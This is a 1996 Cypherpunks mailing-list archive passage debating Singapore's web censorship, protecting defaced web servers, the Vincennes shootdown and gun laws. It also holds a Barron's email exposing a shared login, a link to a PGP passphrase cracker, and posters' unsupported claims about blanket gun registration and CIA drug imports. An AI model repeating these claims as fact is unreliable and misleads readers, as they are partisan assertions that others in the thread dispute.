pseudonym address to use on various support groups can get them from other, > equally insecure, remailers. I've put up a list of remailer front ends, sorted by platform, at http://yakko.cs.wmich.edu/~frogfarm/free/crypt.html#private I welcome all additions. Right now, I have links to Private Idaho (Windows), Yet Another NewsWatcher (Mac), and PGPMR/2 for OS/2 (requires MailReader/2). Nym servers and cpunk remailers are poised to take off, if those who wish to use them are capable of learning. The rest of us can either try to teach 'em in a non-condescending manner, or continue to work on front end utilities. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information "We think people like seeing somebody in a uniform on the porch." -US Postal spokeswoman, quoted in AP 1/27/96. I don't know about you, but the only folks I know who'd enjoy seeing someone in uniform on their porch are leathermen... From tcmay at got.net Sun Sep 1 22:43:55 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 2 Sep 1996 13:43:55 +0800 Subject: Let's Nuke Singapore Back into the Stone Age Message-ID: At 1:41 AM 9/2/96, Arun Mehta wrote: >At 10:35 31/08/96 -0700, Timothy C. May wrote: > >> If discussions of Lee Kwan Yew's dynasty are considered illegal, then >>Singaporans will have to choose not to carry the various newsgroups into >>which *I* post such messages! > >How long do you propose to carry on doing that? Soon, the others >in the newsgroups will be asking you very impolitely to stop, >just as you would if someone kept on and on posting such stuff to cypherpunks. Actually, we already have several examples of how this worked, including some cases I was directly involved in. During the Teale-Homulka trial in Canada, many of us (me, too) posted numerous articles about it to the various *.canada newsgroups, such as soc.culture.canada. Canada had the choice of instructing all ISPs to halt the *.canada newsgroups. There were no real complaints that I recall about messages being "off-topic," as they clearly were very much on-topic. (Not that a few complaints have ever stopped me. While I don't spam newsgroups with auto-generated spam, I figure any article I take the time to actually write and that deals with the newsgroup involved, by my own standards, is fair game. My ISP can cancel my account if he feels I have spammed newsgroups in some way.) My proposal is not to post anti-Singapore screeds to comp.lang.java or the like, but to post them to various groups Singaporans and their neighbors might read. If Singapore wishes to disconnect itself from soc.culture.singapore, this is there choice. Then, the attack can spread to various other groups Singaporans might want to read.... (I call this a _good_ use of "info-terrorism.") ... >True, but Usenet only functions because it works most of the >time. To the extent we subvert this consensus, we damage Usenet, >make it less useful. It shouldn't happen that in trying to save >or spread Usenet, we have to destroy it... Posting the Homulka stuff did not kill the Usenet. Posting the autopsy photos of Nicole Brown Simpson did not kill the Usenet. Posting the innards of RSA Data Security algorithms did not kill the Usenet. If Canker and Sludgewell spam cannot kill the Usenet, if "Make Money Fast" noise cannot kill the Usenet, and if "Babes will fuck 4 U" posts cannot kill the Usenet, then surely some informative posts about the fascist Yew posted to various newsgroups of relevance to Singaporans and Asians will not kill the Usenet! >>And _never_ has it involved determinations of "inappropriate" by >>_governments_! > >There I'm with you -- I'm merely suggesting that you find a way >to protest Singapore's actions in a manner that would be less >objectionable to most Internet users, in Singapore and outside. Why? What is "objectionable" about exposing the truth about Lee Kwan Yew, his feeble son, and their dynasty? What is "objectionable" about teaching them how to use Web proxies, remailers, and other tools of liberty? If the citizens find this stuff objectionable, they can simply not read the stuff! As with books, movies, and magazines. What could be more natural than this? But of course it is the _rulers_ of these Asian kingdoms and satrapies which want the distribution of certain thoughts controlled and denied to their serfs and citizen-units. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From markm at voicenet.com Sun Sep 1 22:45:52 1996 From: markm at voicenet.com (Mark M.) Date: Mon, 2 Sep 1996 13:45:52 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 2 Sep 1996, James Seng wrote: > Now, what makes you think that citizen of Country A has the power or > rights to tell politicians of Country B what to do and what they cannot do? > Just wondering. I have every right as a citizen of country A to tell politicians of country B what they should or shouldn't do. This isn't about American Ideology; it's about natural rights. Politicians of country B can refuse to listen to me or attempt to prevent my corrupt ideas from polluting the minds of its citizens, but they won't succeed very well with the latter. Of course, politicians may be satisfied with making sure that only the most determined citizens will be able to access information they don't want citizens to access, but as technology progresses, it will become much more difficult to prevent this information from spreading to the masses. > > ps: Sorry for the off-topic discussion. Cpunks is certainly not the best place to be discussing free speech. However, the link between free speech and the spread of cryptographic technology is too close to completely overlook. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMipSASzIPc7jvyFpAQFYyAgAuy7FvTpGHqYHi9zw3FMiea2tLnYVWPU6 D6VrGvN5NxRtTE8yW3eKrc1iU/0jQIVxHtUhHcodbPfvGqEtwuZKKbbknNj5GmzS pmhcYPguXDwlXL4m3IjxEvhPg7GZ7tjbhXlPK7ADu0EHxvjwesAcrKyCPddu0i9U e83bo3Q4vBT75WPVpSI1i6jJmC7ql4s3GZVvP2Qf6hzvu9fwSKbAra0ZLBFVKf25 WKwNK2eTVBcQOYytwXOQmdSV/hgFB/Y2T6+PHgnAjaDVeX3WqUuxggk6DpBY2V8g bORwsuZyweJviVZIOjbLx6RDeNJQWWSjUCojHvJyKzqffg23Fi8bAw== =+23m -----END PGP SIGNATURE----- From enzo at ima.com Sun Sep 1 23:02:33 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Mon, 2 Sep 1996 14:02:33 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: <199609020116.UAA01684@manifold.algebra.com> Message-ID: On Sun, 1 Sep 1996 ichudov at algebra.com wrote: > James Seng wrote: > > > > On Sat, 31 Aug 1996, Timothy C. May wrote: > > > The point is to make clear to them that the Usenet and similar Web sites > > > are global in nature, not subject to censorship without a very high local > > > cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then > > > Singaporans will have to choose not to carry the various newsgroups into > > > which *I* post such messages! > > > > Just let to add my comment in regard to this unforuntate discusssion. > > > > To understand the sitution better, you should not impose America > > idealogy and perspection on how things to be done to Singapore. Singapore > > maybe young but there are certain culture too. > > > > Most importantly, the move to censor certain WWW site actually comes as a > > relieve to many people, especially parents who worried about the bad > > influence of it. We can go into the same discussion about whose > > responsibilty it is but before you do that, please bear in mind that this > > is Singapore. > > America is much less different from Singapore in that respect than > you might think. Actually, it is. I've been living in South-East Asia for almost one decade now, and I can tell you that most citizen are more socially conservative than their governments. A few years ago, the Singapore government had to backtrack from a very timid relaxation of rules on soft-porn movies due to the negative reactions from the public. In Singapore, the problem is compounded by the need of preserving good relationships with the even more conservative Malay minority, whose stances have strong backing by the two large neighbours, Malaysia and Indonesia (the case I mentioned had prompted accusations to the government, by members of the opposition Workers Party, of planning the "corruption of the Islamic youth"). Of course, one may argue that the racial, social and religious relations are better handled the American way. That, however, is a controversial issue, and adopting confrontational cowboy attitudes is not going to make the social evolution any faster. Besides, I don't think that the Singapore government can really believe to be able of blocking access to anything on the net: a while ago I had the occasion of talking with some medium rank officers, and they sounded fully aware of the Internet technology and its implications - and willing to take the plunge. IMHO, the present measures represent more a gesture of appeasement to concerned social conservatives, not differently from the CDA in the US, than an attempt to control the flow of information. Enzo From stewarts at ix.netcom.com Sun Sep 1 23:05:56 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 2 Sep 1996 14:05:56 +0800 Subject: Moscowchannel.com hack Message-ID: <199609020357.UAA18140@toad.com> At 01:23 PM 9/1/96 -0400, David Lesher wrote: >> > Write your web site to a CD-ROM and hard-code the base directory into the >> > webserver. >> A hacker who has root can forcibly unmount the cdrom and mount another >> directory on that node. Not a good solution. >Real hard disks such as RL02's & RK07's have WRITE DISABLE >switches.... Many modern SCSI drives have them also, though you may need to connect a switch to the appropriate jumpers. In Hugh Daniel's copious spare time, he's been working on hacking *bsd Unix to cope with a write-protected root drive (you mainly need to set up the swap partition and anything that needs writing in on a separate drive and build lots and lots of symlinks for random logfiles.) RM05s also let you connect them to two computers, though it was a really bad idea to tell both computers to mount them as writeable, since they'd scribble over the superblocks. (This was more useful before Ethernets became widely supported, since you could blaze away at full MASSBUS and/or disk speed instead of 19.2kbps UUCP.) You can play the same games with SCSI today, if you're careful. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # Reassign Authority! From nobody at replay.com Sun Sep 1 23:11:03 1996 From: nobody at replay.com (Anonymous) Date: Mon, 2 Sep 1996 14:11:03 +0800 Subject: [NOISE] Re: FLT 800: From the Rumor Mill... Message-ID: <199609020352.FAA29463@basement.replay.com> "Angelos D. Keromytis" writes: >This has happened before; an Aegis ship in the Persian Gulf shot down >an Iranian Airlines (or whatever it's called) aircraft; i'm not sure >how many died in that incident (i think about 70 - can very well be >wrong). The US just "apologized" for the mistake AFAIK. >- -Angelos Well, not quite the same situation. IIRC, the Iranian aircraft refused to respond to challenges. The captain of the Vincennes added that to the info that the Aegis system was giving him, and decided the aircraft was a threat. Turn a key, push a button, and so long, Airbus. (There was also some discussion about whether the Airbus had military IFF gear aboard that may have led the captain to think it was a warplane, but I don't remember if anything came of it.) The Iranian Airbus was also flying out of what was essentially "hostile" airspace. Despite the massive number of "terrorists" who live here -- at least according to the popular press -- I don't think the Navy has taken the step of declaring CONUS to be a hostile territory. :-) Feel free to correct my memory if I'm wrong. From dlv at bwalk.dm.com Sun Sep 1 23:13:19 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 2 Sep 1996 14:13:19 +0800 Subject: Desubscribe In-Reply-To: <199609011607.JAA22532@dns1.noc.best.net> Message-ID: <4wsLTD44w165w@bwalk.dm.com> "James A. Donald" writes: > > > deserves to be shipped to sweden where they shall be > > > made into cheese by nuns. > > At 04:40 PM 9/1/96 DST, Johnny Eriksson wrote:> > > No thanks, we do not want them. > > You are Swedish? > > I heard on talk.politics.guns somebody say that in Sweden they > had banned knives with a sharp point at the end, and were going > to ban sharp knives altogether. I think he was just engaging in > hyperbole, that he really meant that gun control in Sweden was > unreasonably strict, but on reflection I am not sure. I heard from a reliable source that the Swedish bikini team opposes GAK. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jimbell at pacifier.com Sun Sep 1 23:16:09 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 2 Sep 1996 14:16:09 +0800 Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd) Message-ID: <199609020358.UAA05172@mail.pacifier.com> At 10:15 PM 9/1/96 -0400, Simon Spero wrote: >On Sun, 1 Sep 1996, Alan Horowitz wrote: > >> The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone. >> >> If my memory serves, the Iranian jetliner had its squawker turned off, or >> broken. The officer in charge in the CIC had about ten seconds to decide >> if he was about to be locked-on by a missle. And no real information to > >I think it was actually a combination of a design flaw in the user >interface for the control system combined with a human error that led to >the radar officer confusing the airbus with an (F4?) a hundred miles away >that he'd previously clicked on. Isn't there just the tiniest bit of a double-standard here? If the ship was supposedly "justified" in firing on an airplane just because it _could_become_ a threat, and _could_ fire a missile at any moment, then why can't we turn this logic around and claim that an Iranian aircraft could view an Aegis as a ship which "could become a threat" and "could fire a missile at any moment." Generally, I'm not sympathetic to the Iranians; far from it. But I can smell hypocrisy a mile away and the US military's "logic" in this area is unbelievable. Jim Bell jimbell at pacifier.com From enzo at ima.com Sun Sep 1 23:16:18 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Mon, 2 Sep 1996 14:16:18 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: On Sun, 1 Sep 1996, Mark M. wrote: > I have every right as a citizen of country A to tell politicians of country B > what they should or shouldn't do. This isn't about American Ideology; it's > about natural rights. There are no "natural" rights: a right is the contractual flipside of the an obligation, and is only meaningful in the context of a society - which is a thing that evolves continuously. Enzo (more with Hume and Hayek than with Descartes and Rousseau). From grafolog at netcom.com Sun Sep 1 23:27:34 1996 From: grafolog at netcom.com (jonathon) Date: Mon, 2 Sep 1996 14:27:34 +0800 Subject: Bob Dole on Drugs In-Reply-To: <199609011633.LAA30982@manifold.algebra.com> Message-ID: On Sun, 1 Sep 1996, Igor Chudov @ home wrote: > during which he's expected to propose that the > military be enlisted to assist in a renewed war on > drugs. Question: Since the military, or more specifically, the CIA imports most of the drugs into the US, just which part of the military is going to declare war on which part of the military? Or is all that going to get swept under the rug, so that the ripocrats can further enslave the american population? xan jonathon grafolog at netcom.com However, if you're tired of the Lesser of N evils, Cthulu's export policy is that you can't escape anyway, and your puny mortal lives will be absorbed along with his morning coffee. Your encryption technology is futile against the Elder Gods, and the arcane formulas in the Cyphernomicon of that mad physicist Tim The Enchanter may summon spirits from the vasty deep, but no secrets are safe from Nyarla-S-Ahothep who knows all and sees all. Bill Stewart From grafolog at netcom.com Sun Sep 1 23:32:52 1996 From: grafolog at netcom.com (jonathon) Date: Mon, 2 Sep 1996 14:32:52 +0800 Subject: Sen. Leahy's "impeccable cyberspace credentials" In-Reply-To: <199609012034.NAA11901@dns1.noc.best.net> Message-ID: On Sun, 1 Sep 1996, James A. Donald wrote: > > I agree with what you are saying but not all polititions are that bad. > > You make it sound as if their are no politisions are for freedom of the > > net. > So who is the exception? Harry Browne Libertarian Party Candidate. xan jonathon grafolog at netcom.com However, if you're tired of the Lesser of N evils, Cthulu's export policy is that you can't escape anyway, and your puny mortal lives will be absorbed along with his morning coffee. Your encryption technology is futile against the Elder Gods, and the arcane formulas in the Cyphernomicon of that mad physicist Tim The Enchanter may summon spirits from the vasty deep, but no secrets are safe from Nyarla-S-Ahothep who knows all and sees all. Bill Stewart From ichudov at algebra.com Sun Sep 1 23:33:32 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Mon, 2 Sep 1996 14:33:32 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: <199609020417.XAA03139@manifold.algebra.com> Enzo Michelangeli wrote: > On Sun, 1 Sep 1996 ichudov at algebra.com wrote: > > James Seng wrote: > > > Most importantly, the move to censor certain WWW site actually comes as a > > > relieve to many people, especially parents who worried about the bad > > > influence of it. We can go into the same discussion about whose > > > responsibilty it is but before you do that, please bear in mind that this > > > is Singapore. > > > > America is much less different from Singapore in that respect than > > you might think. > > Actually, it is. I've been living in South-East Asia for almost one > decade now, and I can tell you that most citizen are more socially > conservative than their governments. ... snippity snip ... > IMHO, the present measures [in Singapore] > represent more a gesture of appeasement to concerned social conservatives, > not differently from the CDA in the US, than an attempt to control the > flow of information. Ummm, sounds pretty close to what we have here... - Igor. From tcmay at got.net Sun Sep 1 23:39:54 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 2 Sep 1996 14:39:54 +0800 Subject: Free Speech and List Topics Message-ID: At 3:19 AM 9/2/96, Mark M. wrote: >On Mon, 2 Sep 1996, James Seng wrote: >> ps: Sorry for the off-topic discussion. > >Cpunks is certainly not the best place to be discussing free speech. However, >the link between free speech and the spread of cryptographic technology is too >close to completely overlook. I think it is as good a place as any to discuss free speech. The issues surrounding Net censorship, Singapore, the CDA, Germany, the shutdown of Julf's server, etc., are central to our concerns. And, in fact, it is "cypherpunk technology" which will have a more lasting effect on these issues than mere talking about it in some "free speech discussion group" will have. More disturbing to me recently has been the steady increase in subscribers to this list who don't seem to value free speech very highly, who write of their own nation's censorship as valiant efforts to protect citizen-units from foreign devils, and, even more shockingly, from supposed defenders of electronic freedom who are now talking about the need for limits on anonymity. With friends like those... --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From webmaster at online.barrons.com Sun Sep 1 23:40:34 1996 From: webmaster at online.barrons.com (webmaster at online.barrons.com) Date: Mon, 2 Sep 1996 14:40:34 +0800 Subject: Your password for BARRON'S Online Message-ID: <199609020420.AAA10320@online.barrons.com> Thank you for registering with BARRON'S Online! THE USER NAME YOU HAVE CHOSEN IS cypherpunks THE PASSWORD YOU HAVE CHOSEN IS cypherpunk Please remember that your user name and password are case-sensitive (i.e. Bsmith is different than bsmith) and you should enter them as shown above. Your user name is required in its exact form each time you want to use registered areas on our site (including the exact upper/lowercase combination). The same restriction applies to your password. Your user name and password will allow you to access all of the features of BARRON'S Online. The rest of this message contains information about using your password and user name on BARRON'S Online. You may find it helpful to save this message for future reference. WHAT HAPPENS NOW? 1. Return to BARRON'S Online (www.barrons.com). You can use your password and user name to log in to any part of the site that requires registration (such as the Table of Contents, this week's stories, Dossiers and Market Day, and so on). The first time you go to one of these parts of BARRON'S Online, you will be prompted to enter your user name and password. 2. If you ever forget your password, or need any registration-related information, just click on the REGISTER button from the BARRON'S Online gateway page to find the help you need. Welcome to BARRON'S Online... we look forward to seeing you again and again! BARRON'S Online Customer Service barrons-support at www.barrons.com From qut at netcom.com Sun Sep 1 23:52:15 1996 From: qut at netcom.com (Dave Harman OBC) Date: Mon, 2 Sep 1996 14:52:15 +0800 Subject: Silenced Machine Guns Are Safer Than TWA Message-ID: <199609020433.VAA29977@netcom.netcom.com> ! "James A. Donald" , writes: ! >I heard on talk.politics.guns somebody say that in Sweden they ! >had banned knives with a sharp point at the end, and were going ! >to ban sharp knives altogether. I think he was just engaging in ! >hyperbole, that he really meant that gun control in Sweden was ! >unreasonably strict, but on reflection I am not sure. ! > ! ! In a survey conducted in Sweden a few years ago, 50% of Swedish ! households had access to guns (generally military service weapons ! and sporting shotguns). Guns are, however, licensed and regulated, ! and seldom used in crimes. Licenses for "personal protection" are ! almost unobtainable. At least one military officer was court martialed ! when his service revolver was stolen from his automobile. ! ! The most significant "mass murderer" crimes in Sweden (one last ! year and one in the 1970's) were caused by people who used their ! legally-obtained military weapons. Hundreds of thousands of private American citizens legally own machine guns, silencers, live hand grenades, .75 caliber machine guns, etc. Perhaps 40% or so of the populace lives in an area without significantly higher regulations concerning such than the federal, which is not that bad. There is no federal law making silenced machine guns substantially more difficult to purchase and shoot than ordinary handguns. The feds certainly don't require training or any other similar requirement. Contrary to popular fiction, ALL firearms have been permanently registered since the 1968 Gun Control Act. The media monopoly lies when they say the contrary. How many firearm crimes were committed by these hundreds of thousands of ordinary untrained destructive weapon owners with their destructive weapons in the entire span of 1980-1996? *NONE*! THEREFORE, everyone in Sweden and America should be allowed to own silenced machine guns without any greater than the usual restrictions. BTW, I muse that the issue of guns, drugs and censorship make an excellent litmus test for libertarians: either you support the legalization of, all of, or your a fake. From grafolog at netcom.com Mon Sep 2 00:03:16 1996 From: grafolog at netcom.com (jonathon) Date: Mon, 2 Sep 1996 15:03:16 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: On Mon, 2 Sep 1996, James Seng wrote: > Most importantly, the move to censor certain WWW site actually comes as a > relieve to many people, especially parents who worried about the bad And it is a pain for people whodevelop websites. To avoid offending those who are easilly offended, I either have to put up a stupid << and very misleading warning label >> or block them out. My solution is to put up the misleading, and incredibly stupid "warning" label. << Stupid & misleading, because although my pages do violate the CDA, and most other countries statues on what is acceptable content, the same text, if written would not even be given a second glance -- except maybe by the humint part of that country, who would use it for training purposes. >> > for artistic which rules out soft-porn. It may be surprising but many > people (in Singapore) do welcome censorship sad to say. And what will happen to Singapore when "their beloved leader" dies, especially if a result of an assasination? > passive manner. They _do not_ read every issue of every magazine available > in Singapore. They only do so when there is enough complains. For example, IOW, the newspapers, etc have to either not print stories that may cause complains, or print them, and go to jail. Censorship at its most vicious, and the most destructive of both the society it tries to appease, and the individual who doesn't conform to its sheere stupidity. > One more point. They know it is impossible to censor everything. It is And passing laws that are unenforceably, is simply another way to ensure that laws in general are ignored, which leads to the increased instability of the regime, which leads to the precise opposite effect of what usually is intended. xan jonathon grafolog at netcom.com From qut at netcom.com Mon Sep 2 00:18:23 1996 From: qut at netcom.com (Dave Harman OBC) Date: Mon, 2 Sep 1996 15:18:23 +0800 Subject: http://infinity.nus.sg/cypherpunks/ Message-ID: <199609020450.VAA02140@netcom.netcom.com> Someone keeps asking for the filtered cypherpunks archive: http://infinity.nus.sg/cypherpunks/ It's filtered with hypermail and is lynx friendly. It's easiest to read by choosing the link to filter by subject. From Adamsc at io-online.com Mon Sep 2 00:24:20 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 2 Sep 1996 15:24:20 +0800 Subject: WARNING vIRuS! Message-ID: <19960902051255234.AAA172@IO-ONLINE.COM> On Sat, 31 Aug 1996 23:41:58 -0700, Alan Olsen wrote: >> There is a new and VERY dangerous virus called the HAZ-MAT virus! >This is the clueless kind of crap I expect pitched to AOL users and upper >level management. >The only way that you could obtain the effects described above is with Black >Magic and/or Voodoo. (And not even then.) > >I remember a similar hoax going around about 3-4 years ago about viruses in >image files. I guess nothing on the net is ever forgotten entirely. >Especially the urban legends and bullshit. You ever notice how that is? People *never* remember things like "You have to execute something to get a virus". They *always* remember something like "Good Times." Reminds me of the guy who said you could stick all sorts of sensitive data in README.TXT because you can be sure nobody will look in there. - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From markm at voicenet.com Mon Sep 2 00:42:14 1996 From: markm at voicenet.com (Mark M.) Date: Mon, 2 Sep 1996 15:42:14 +0800 Subject: PGPCrack for DOS Message-ID: -----BEGIN PGP SIGNED MESSAGE----- There is now a DOS version of pgpcrack. It's available at http://www.voicenet.com/~markm/pgpcrack.html. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMipT5yzIPc7jvyFpAQE8Ewf+J7x0km0xcGZM32c4clmFJ5I9z/bAj6bL ryXS1BNDBbC72HuJWQPUeqDc0xEc6uyjCc0iytfBL0VqwjlLKCb7KZtxgP7gOlf6 T12/ZNQZwGy3PeClLthQRqQ0fjUtVs4mXWp+sDnAAClI6J+xEL/cBdHDD5tREngM ufDwueSAwFPQQE/adpS0E3alHj1XqdHMam5s60SGpsZyknnUhnUiAIc2w2CdmjJU 5jywEOosiMcbvYqhBaSuy3S53Pfjh07wEFfXp0t9CvvsJY13ipIW6jvgQgVYQL6u 0f1ob7CkwxiD/z598aXmmCc4Nmn0pFg9Zvqw9xLcs88s4GaGsH15gw== =zGl8 -----END PGP SIGNATURE----- From Adamsc at io-online.com Mon Sep 2 00:56:55 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 2 Sep 1996 15:56:55 +0800 Subject: hackers texts Message-ID: <19960902051749062.AAA212@IO-ONLINE.COM> On Sun, 01 Sep 1996 08:51:36 EDT, patrick b cummings wrote: >If any of you hackers out their have wrote any texts for beginning >hackers or know of any please send them to me at patrickc at juno.com You know, I think his mail server has a 36 hour delay on incoming messages. Either that or he's Roadkill on the Information Superhighway // \\ // \\ ______________ // \\ | | // \\ | Information | // \\ | Superhighway | // ____ \\ | 56MB/s | // /____\ \\ |______________| // |==__==| \\ | | // ~||~~||~ \\ | | // ' \\ | | // // \\ | | // \\ | | // / / \\ | | // \\ | | // /// \\ | | // \\ | | // . ,& \\ | | // . `;//* IS HERE \\ // . `|/^\@'< ' . | \\ // `_/x@=%$P/,', <---/ \\ // >@#)*?o$%( , \\ // \.X#j~\===B \\ / \\ : The Clue truck got him... [In case you haven't noticed yet, this looks best with a non-proportional font] - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From Adamsc at io-online.com Mon Sep 2 01:07:08 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 2 Sep 1996 16:07:08 +0800 Subject: Moscowchannel.com hack Message-ID: <19960902051921875.AAA201@IO-ONLINE.COM> On Sun, 1 Sep 1996 10:09:32 -0500 (CDT), Igor Chudov @ home wrote: >> > Not really crypto, but related to the DOJ hack in a way. >> > >> > Moscow Channel is a pretty slick, Russian news/commentary >>page. Their Web >> > site was hacked and altered by someone who didn't seem to >>like Russians all >> > Just a matter of time before some builds a dedicated Satan >>type tool that >> > scans for HTTP server holes or messed up file permissions >>to make locating >> > potential victims easy. >> Write your web site to a CD-ROM and hard-code the base >>directory into the >> webserver. > >A hacker who has root can forcibly unmount the cdrom and mount >another >directory on that node. Not a good solution. Hack your system kernel to only allow mounting read-only media to that point. Most hackers wouldn't try "hot-patching" the system kernel. The ones that can probably have better things to do than hack your page. - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From qut at netcom.com Mon Sep 2 01:07:36 1996 From: qut at netcom.com (Dave Harman OBC) Date: Mon, 2 Sep 1996 16:07:36 +0800 Subject: Free Speech and List Topics In-Reply-To: Message-ID: <199609020517.WAA06504@netcom.netcom.com> ! At 3:19 AM 9/2/96, Mark M. wrote: ! ! >On Mon, 2 Sep 1996, James Seng wrote: ! ! >> ps: Sorry for the off-topic discussion. ! > ! >Cpunks is certainly not the best place to be discussing free speech. However, ! >the link between free speech and the spread of cryptographic technology is too ! >close to completely overlook. ! ! I think it is as good a place as any to discuss free speech. The issues ! surrounding Net censorship, Singapore, the CDA, Germany, the shutdown of ! Julf's server, etc., are central to our concerns. ! ! And, in fact, it is "cypherpunk technology" which will have a more lasting ! effect on these issues than mere talking about it in some "free speech ! discussion group" will have. ! ! More disturbing to me recently has been the steady increase in subscribers ! to this list who don't seem to value free speech very highly, who write of ! their own nation's censorship as valiant efforts to protect citizen-units ! from foreign devils, and, even more shockingly, from supposed defenders of ! electronic freedom who are now talking about the need for limits on ! anonymity. How about supporting the effort for comp.cypherpunks ? About the need for limits for anonymity, guess what brought that on? Crime? Yes! The crime of the media monopoly violating the anti-trust acts, because people are ignorant enough to trust the mass media for their news. From Adamsc at io-online.com Mon Sep 2 01:12:40 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 2 Sep 1996 16:12:40 +0800 Subject: Bob Dole on Drugs Message-ID: <19960902052400296.AAA43@IO-ONLINE.COM> On Sun, 1 Sep 1996 11:33:02 -0500 (CDT), Igor Chudov @ home wrote: >http://allpolitics.com/news/9608/31/radio.addresses/ > >... snip ... > > Dole, who returned to Washington for Labor Day > weekend, also pledged to use the White House as a > bully pulpit to promote the "moral message" > against drugs and to criticize what he called the > entertainment industry's glamorization of drug use. > > On Sunday, he is to address the convention of the > National Guard Association of the United States > during which he's expected to propose that the > military be enlisted to assist in a renewed war on > drugs. This actually makes a lot of sense; if you've decided on an all-out war on drugs, doing it right is *much* better than some sort of weenie effort like we've got. I liked Robert Heinlein on immigration "If we're going to stop immigration build a Berlin style wall complete with alligators in the moat. Otherwise give up the pretense; nothing is more expensive or less useful than a wall that isn't." (very loosely paraphrased) - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From tcmay at got.net Mon Sep 2 01:14:55 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 2 Sep 1996 16:14:55 +0800 Subject: Silenced Machine Guns Are Safer Than TWA Message-ID: At 4:33 AM 9/2/96, Skippy wrote: >Contrary to popular fiction, ALL firearms have been permanently >registered since the 1968 Gun Control Act. The media monopoly lies when >they say the contrary. Nope. Gun sales between individuals without any paperwork were fully legal in some places until recently (and may still be fully legal...I can only speak of California). >From 1974 until a couple of years ago, I bought and sold a dozen or more rifles, handguns, and even Evil Assault Weapons, mostly through fully legal gun shows. I even sold a .357 Smith to some guy, made a joke about how great these gun shows were and how great it was to be able to just take cash and hand over a gun without any paperwork...the guy laughed and said he was a San Jose cop. I felt nervous for a few seconds, but quickly realized there was no law *I* was breaking, so I laughed too. Most of these guns I kept no records on, nor did any laws say I had to. (A few years ago it became necessary for even private citizen-units to obtain the proper firearms transfer papers from the gubment. I wanted to sell a laser-equipped Heckler & Koch SP-89 without creating a paper trail (as I'd not had one when I acquired the piece a few years earlier), so a friend of mine used his friendly neighborhood libertarian FFL dealer, who has a policy that the stack of transfer forms he is required to keep on file will mysteriously burn up if the Feds ever seek out his records. (Who knows if he'll abide by this policy, but the point is that there are literally tens of thousands of these "kitchen table FFL dealers," and no computerized filing of records. This is one reason I quit the NRA: they are advocating the "instant check." Such an instant check would mean massive computerization of all files, and of course cross-referencing to files on citizens. This would be much worse than the "paper chaos" of stacks of firearms paperwork sitting in dusty filing cabinets. I'll take a 10-day ineffectual waiting period to a Big Brother database of all purchasers.) >BTW, I muse that the issue of guns, drugs and censorship make an >excellent litmus test for libertarians: either you support the >legalization of, all of, or your a fake. I'm not sure what the "legalization of censorship" would mean, though I support the right of anyone to screen out what they choose not to read or view. And I support the right of companies to 